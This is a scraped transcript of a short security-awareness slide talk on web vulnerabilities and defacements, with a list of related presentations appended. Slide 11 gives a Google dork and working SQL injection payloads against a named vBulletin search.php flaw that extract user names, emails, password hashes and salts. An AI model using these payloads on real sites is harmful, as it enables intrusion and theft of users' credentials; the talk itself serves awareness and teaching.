Presentation is loading. Please wait.

Presentation is loading. Please wait.

Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)"— Presentation transcript:

1 Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

2 Disclaimer All the information provided on this presentation for educational purposes only. The speaker is not liable for any damages you may cause for using this knowledge on actual attacks. The following tools and techniques are publicly available, “ANYONE” has access to them.

3 Websites “In the August 2011 survey we received responses from 463,000,317 sites.” -netcraft.com DeveloperJuly 2011PercentAugust 2011PercentChange Apache235,326,98565.86%301,771,51865.18%-0.69 Microsoft60,086,34616.82%73,415,91615.86%-0.96 nginx23,357,4976.54%35,533,4397.67%1.14 Google15,641,5744.38%17,061,0033.68%-0.69

4 Defacements “Defacements Statistics 2010: Almost 1,5 million websites defaced, what's happening?” Zone-H.org

5 Defacements Attack ReasonYear 2010 Heh…just for fun!829.975 I just want to be the best defacer289.630 Not available94.017 Patriotism58.970 Polit­i­cal reasons57.083 Revenge against that website45.093 As a challenge44.457

6 Web Vulnerabilities Why website administrators need to be vigilant? – The web is home to 2.08 billion netizens. – Information is widely, freely available to anyone who wants it. Why is it “always” important to protect our websites? – This contains personal information. Even an IP is personal information. (privacy *disputable) – This can be used by crackers to host their botnets, etc…

7 Website Vulnerabilities Is not limited to script and system exploitation. – Systems can also be compromised by admin(human) errors. Easy passwords. Multiple systems/sites with the same passwords. Faulty password storing or password sharing. Failed/No firewall or anti-virus on personal computer.

8 Targeted Attacks Open Source – Exploiting Can take minutes if an exploit is already available. Can take weeks if you are trying to exploit from scratch. – Dorks, Tools Non Open Source – Exploiting Can take minutes if web-app is badly coded. Can take months if web-app is secured(but not well enough). – Dorks, Tools

9 Random Attacks Google Dorks – cache: – link: – related: – info: – define: – stocks: – site: – allintitle: – intitle: – allinurl: – inurl:

10 Attack Vectors known vulnerability (i.e. unpatched system) undisclosed (new) vulnerability configuration / admin. mistake brute force attack social engineering Web Server intrusion Web Server external module intrusion Mail Server intrusion FTP Server intrusion SSH Server intrusion Telnet Server intrusion RPC Server intrusion Shares misconfiguration Other Server intrusion SQL Injection URL Poisoning File Inclusion Other Web Application bug Remote administrative panel access through social engineering Attack against the administrator/user (password stealing/sniffing) Access credentials through Man In the Middle attack Remote service password guessing Remote service password bruteforce Rerouting after attacking the Firewall Rerouting after attacking the Router DNS attack through social engineering DNS attack through cache poisoning

11 Demo Attack via Google Dork + Public Exploit. – Vbulletin 4.0.x to 4.1.2 “search.php” SQLi vulnerability. Dork : inurl:search.php?search_type=1 &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# md5(md5($pass).$salt)

12 Demo Testing inputs. Checking headers.

13 Demo Attack via Google Dork(targeted) + Tools(Havij). – Dorking a target site to find SQLi vulnerable pages.

14 The top Web vulnerability we face “Ignorance of the issues is at the root of practically every Web vulnerability we face. Be it the technical flaws such as SQL injection and cross-site scripting or operational issues such as no standards and lack of vulnerability testing, we’re just not where we need to be with Web security. And unless and until we focus on the right target, we’ll continue to struggle with Web security. It’ll be a continuous loop of 1)develop code, 2)deploy system, 3)experience a breach or fail an audit/assessment, 4)track down the why and how of the flaws, fix the flaws, 5)start all over again.” - Kevin Beaver

15 Spotting Web Vulnerabilities Thank you. -sungazer

Download ppt "Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)"

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore.
Copyright © 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.

1 Web Servers / Deployment Alastair Dawes Original by Bhupinder Reehal.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.

Hackers, Crackers, and Network Intruders: Heroes, villains, or delinquents? Tim McLaren Thursday, September 28, 2000 McMaster University.
IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.

Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Chapter 6 Security & Privacy Web servers continue to be attractive target for hacker for variety of reasons –Most easy target –Personal satisfaction –Political.

Chapter 6 Security & Privacy Web servers continue to be attractive target for hacker for variety of reasons –Most easy target –Personal satisfaction –Political.
Assessing the Threat How much money is lost due to cyber crimes? –Estimates range from $100 million to $100s billions –Why the discrepancy? Companies don’t.

Assessing the Threat How much money is lost due to cyber crimes? –Estimates range from $100 million to $100s billions –Why the discrepancy? Companies don’t.
Hacking Web Server Defiana Arnaldy, M.Si 0818 0296 4763.

Hacking Web Server Defiana Arnaldy, M.Si
BUILDING A SECURE STANDARD LIBRARY Information Assurance Project I MN121051 Tajuddin hj. Tappe Supervisor Mdm. Rasimah Che Mohd Yusoff ASP.NET TECHNOLOGY.

BUILDING A SECURE STANDARD LIBRARY Information Assurance Project I MN Tajuddin hj. Tappe Supervisor Mdm. Rasimah Che Mohd Yusoff ASP.NET TECHNOLOGY.
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Capture The Flag Review Fall 2003 Giovanni Vigna University of California Santa Barbara

Capture The Flag Review Fall 2003 Giovanni Vigna University of California Santa Barbara

Similar presentations

Ads by Google